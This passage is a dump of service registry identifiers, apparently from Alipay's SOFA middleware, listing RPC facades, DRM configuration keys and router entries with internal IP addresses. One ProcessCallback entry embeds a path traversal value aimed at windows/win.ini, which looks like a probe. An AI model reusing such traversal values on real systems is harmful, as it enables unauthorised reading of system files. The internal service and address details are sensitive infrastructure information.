_ID#@#SOFA","com.alipay.contentlib.common.service.facade.common.CommonDictFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.iotcube.drm.IotcubeDrm.upgradeSyncSleepTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcardcore.common.service.facade.PcardCardManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianquery.digestquery.common.service.PolicyDividendDispatchDigestQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.huntshadow.HsDingTalkGrouService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcplan.common.service.facade.api.PlanExerciseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acnotifycore.common.service.facade.StationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@bar#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_30.73.178.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbprod.common.service.facade.activity.service.ActivityBarrageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.definprodcenter.facade.api.internal.fileservice.AgreementFilePostService:1.0:amSubMerchantFile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.audit.DrawingAuditFlowFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquirePaySimulateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.UndifferentiatedAttackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.service.facade.service.DataSyncInspectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.dynamicview.ViewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilemock.common.service.facade.api.RpcLimitServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_G_SETTLEGW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.178.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY@apshopcentermng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.mwalletmng.mwalletmng_dataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:voucherprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innertrans.facade.api.InnerAccountTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.InstanceQueryApi:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_SCCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:agdsRoExecuteService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_ACCOUNTING#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:accorderexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.finauth.service.InstL2AccountApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accha.core.drm.SwitchStatusDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.advanceMobileCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.rcacheTairCache_dest.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:ifaatam@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanmng.service.facade.FunctionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.dislike.api.DislikeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.aegis.service.loan.InterestSettleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofabootweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.asset.HealthAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.234.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.shared.activity.drm.SceneActivityDrm.desensitive,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.facade.antha.AnthaPerformanceAlarmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bis.common.service.facade.tools.BioFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.184.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.accordercore.common.service.facade.control.auth.api.AuthEventRecoverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizops.facade.BizStampQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.fundallocation.FundPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseUploadFileFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.runtimedatasrcmng.common.service.facade.api.process.task.ProcessTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.volvo.common.service.facade.api.datasource.KmonitorQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoCallRService:1.0:instinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.46.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.facade.ficc.goldb2c.api.BackendTransMngQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.habaseline.common.facade.view.troublehunter.service.THBizScenarioQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.fund.facade.api.FundIncomeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprodtrans.facade.QueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kbproxy.facade.AliDataQuerySPI:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paycore.service.deposit.query.QueryDepositService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_MERCHANT_MANAGER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_attachementCoreGatewayFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.SyncProdSwitchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.EteTestCoreCommonResource.sleepTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.core.service.drm.CacheDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.orderfront.common.service.facade.DtOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointFlowinService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.zdatacontext.common.agent.drm.UniformAssertClientDRM.clientAvailabel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.equitytradecore.common.service.facade.api.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.label.LifeLabelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:markingLabelBatchOfflineHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkwirelessdataportal.common.service.panda.SceneManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.159.248.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbprod.common.service.facade.trade.service.CommoditiesTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.CoaBizTemplateOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.inner.AssetQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.manager.ClientGrayControlManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanapply.common.service.facade.service.credit.CreditProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finfoprodCompanyRuleProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobilebc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.BehaviorFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.register.MerchantApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.80.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbsalescenter.common.service.facade.signcontract.GoldSignContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.facade.service.ActionGroupServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.prehandle.PreContentUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clivemng.common.service.facade.api.salary.SalaryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.236#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.transferprod.common.service.facade.api.TransferToCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:apires_commonTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antaid.common.service.facade.dutyQuota.AlarmOnDutyQuotaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.linka:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.authcenter.service.facade.FaceRecognitionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.112.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_S_LINKS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipayplus.mobile.foundation.facade.cashier.iecp.IecpCashierWithdrawService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmmccore.bus.service.facade.McInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmScriptorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.maxUserDefinedValueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:kbomp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.mcop.mng.BizConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.socialdispatcher.DispatcherUserTaskLifecycleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ifccardcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_finriskeventseek_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insuranceprod.facade.IssueFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.arater.common.service.facade.MsgSendTaskMangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.rulecenter.RuleTemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.cmng.push.InnerPushFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.loadTestZdatabusTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.182.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.certify.service.facade.enterprisesteward.operator.EnterpriseStewardOperatorManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.column.ColumnQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.itemcore.common.service.facade.v2.ItemICProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/../../../../../../../../windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecItemQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.28.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insclaiminvestprod.common.service.facade.EmployeeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:publichome_interfaceApplayCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayutrprod.common.facade.link.SystemHaLinkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.1.0.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.omocore.biz.memory.UserMemoryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpublish.common.service.facade.QueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_SCCORE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-insrapbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintranscore.trustcloseend.service.facade.TrustCloseEndOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdQualificationInfoQueryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assetxp.common.service.facade.api.AssetExchangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.search.SearchDataManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.OpinioncoreDrmResource.cssearchEmtionAnlsUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.213.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@kbservcenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mrchcommerce.smdd.common.service.facade.api.Smdd4SecShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.openapi.TenantService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.SymbolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.BizCertifyRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_fcparamcore_schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minitrans.service.facade.advancepayment.api.AptransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.154.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ordercore.common.service.facade.orderlink.OrderLinkSettleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdabombardier.common.service.facade.modify.DeviceModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.pointBudgetPlanId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.customscenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ccr.facade.ArriveTimeConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paychecker.common.service.paycheckersdk.service.ReversePayCheckerService:1.0:lifemock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.right.GiftRightsPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.common.service.facade.auto.AutoAlarmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iprivacy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.galaxy.XMktUnionActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.ChatMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frservcenter.facade.api.TreeInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ALDINGPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata3.model.service.LogicProcessService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.manage.facade.api.sync.ParmInstanceSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.identity.AutoMktIdentityFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.common.service.facade.member.api.OpenCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unibase.common.service.facade.api.activity.ActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_CP_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secucommunity.open.facade.admin.OpenAdminOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.mng.TaskManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmvisaprod.common.service.facade.api.VisaTimeoutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.processmng.processmng_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcinstoperation.common.service.facade.api.promote.MessageNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:bkmi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.client.api.ApiTestFacade:1.0:mrchiscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.alphad.common.service.facade.tntinst.api.IMemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:cstask_initStatusProcessCallbackImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.cardWriteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.common.service.client.api.ApiTestFacade:1.0:socialportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.biz.shared.platform.app.AppQuerySwitchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcommerceprod.common.service.facade.ChannelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.biz.facade.api.BizPackageLoadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.service.facade.depository.api.DepositoryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.manager.facade.CustomPrizeParamRuleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.141.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.rollUnknownMaxLoadNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acccenter.common.service.facade.inner.UserFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.revtransTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.icontrol.common.service.facade.api.IvrShuntServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.170.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acpmscore.facade.TaskDeclarationFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.oceanbase.obforumcore.service.open.subject.manage.SubjectCommunityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseConfigFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.mwalletmng:name=com.alipay.mwalletmng.mmng.drm.FuCardDrm.giveSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.guardian_client:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.limiter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappcommon.common.service.facade.whitelist.WhiteListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:zappinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.service.facade.depository.api.SubAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.msg.PublicBroadMsgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.openhome:name=com.alipay.tutorial.msgbroker.drm.DrmDemo.money,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finsnsbff:name=com.alipay.finsnsbff.stock.discoverySubjectsPrefetchItemCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:antsecurity_uctfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_RPC_TRANSMIT_LIFEPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.urge.UrgeTicketQueryFacade:1.0:zmprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:uemprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.PrivilegeVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.api.category.MsContentCateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexpprod.service.facade.api.checkout.CheckoutConfirmOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.v3.service.facade.api.blacklist.SpecialBlacklistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.commandcenter:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.hostCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financemng.common.service.integration.finfundtaskcenter.YebFundFileFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.agent.AgentOperationFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.biz.group.rpc.InviteFriendsRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.commo